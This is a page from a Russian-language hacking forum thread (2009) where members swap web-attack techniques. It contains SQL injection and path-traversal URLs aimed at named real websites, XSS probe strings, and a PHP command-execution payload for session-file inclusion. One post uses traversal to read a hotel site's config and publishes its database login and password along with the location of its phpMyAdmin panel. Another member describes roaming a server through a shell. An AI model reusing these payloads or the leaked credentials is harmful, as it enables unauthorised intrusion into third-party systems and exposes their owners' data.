Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в куках может быть только идентификатор сессии и всё, но мыло и другие данные, введенные при регистрации, например, могут быть отображены в сессии при её инклуде
     
  2. Матня

    Матня Banned

    Joined:
    19 Dec 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит

     
  3. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    вообщем наконец все поняли што я вас необманую...
    да /etc/passwd необязательная конструкция...
    но она проходит..
    писал просто для наглядности...
     
    #10763 547, 22 Dec 2009
    Last edited: 22 Dec 2009
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    практически никогда, в 1 случае из 1000 может быть, так что польза от такой инфо стремится к нулю
     
    1 person likes this.
  5. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    тыже толькошто писал што никогда неслышал про такую уязвимость:)
    а тут уже пишеш как будто ты ее 1000 раз юзал:)
    штото тут попахивает.....
     
  6. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Для наглядности чего? Объясни плз в каком случае нужно использовать именно твой вариант, при инклуде из сессии.

    Т.е. когда нужни использовать:
    ?page=/etc/passw%00< system($_GET['cmd']); ?>
    и невозможно использовать просто вот это:
    ?page=< system($_GET['cmd']); ?>
     
    #10766 Qwazar, 22 Dec 2009
    Last edited: 22 Dec 2009
    1 person likes this.
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Юзай LIMIT
     
  8. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    http://www.gexecutives.com
    /job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns+and+column_name>'some_column'--
     
  9. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
     
  10. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Универсальнее "><script>alert()</script> или '><script>alert()</script>
    Что бы в случае чего,закрыть предидущий тег.В любом случае,лишним не будет,но может помочь.
     
    #10770 m0Hze, 22 Dec 2009
    Last edited: 22 Dec 2009
  11. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
    начинаю применять union+select и результатов нет, в чем проблема?
     
  12. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Подзапросы?
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/hotel.1000turov.ru/www/hoteld2.php
    
     
  14. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Спасибо всем за подробные ответы,но есть ещё одна идейка.Используя вышеприведённые методы,нужно знать,значения каких переменных записывается в сессию...а двиг самописный.
    Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.Подозрения на невыполнение кода именно в директории загруженных файлов.Поскольку скрипты выполняются,можно попробовать последовательность команд,но не уверен...


    P.S.: Файлы сессий 100% инклудятся и хранятся в /tmp (вчера проверял).Буду искать переменные сессий,поскольку двиг мне неизвестен.
     
  15. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    m0Hze, а какие именно? Можешь привести примеры?)
    Pashkela, спб, но если честно, я не понял что дает твой линк :(
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    гораздо круче обычной скули, обычная читалка, но последствия ужасные для админа могут быть:

    Code:
    http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/1000turov.ru/www/inc/my.php
    
    смотрим сорцы, а там:
    
    <?php
    	$connection = mysql_connect("localhost", "ayen", "chobot");
    	mysql_select_db("chobot", $connection);
    ?>
    
    ну и осталось только phpmyadmin найти, что тоже оказалось легко:

    Code:
    http://hotel.1000turov.ru/myadmin/
    
    дел ровно на 1 минуту. Привелегии не проверял (но новую БД почему-то можно создавать, гы)
     
    2 people like this.
  17. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Как ни странно,мой способ сработал))).Теперь смогу попробовать ваши(исходники теперь будут).Выражаю огромною благодарность ).
     
  18. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    мм,а если админка расположена за пределами docroot,то как к ней тогда вообще доступ получить ?
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    включить хек-догадку на 45%

    Если у тебя есть инклуд - причем здесь админка? А вообще задавай вопросы конкретно, сам перечитай, что пишешь - с ума можно сойти, пока вгонишь, о чем вообще речь, предлагаешь всем мотать по три страницы назад? "Свой метод прокатил" - ты о чем вообще? Язык борется за независимость от мозгов?
     
  20. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3

    Не понимаю,чего ты не понял.По-моему,я ясно дал понять,что решил проблему.

    НОВЫЙ АБЗАЦ - НОВАЯ МЫСЛЬ

    Когда я лазил по серваку с шелла,то нашёл админку за пределами docroot.Да,у меня есть инклуд,но меня интересует,как ею вообще люди пользуются.

    P.S.: Можно было ответить и в более вежливой форме.
     
Thread Status:
Not open for further replies.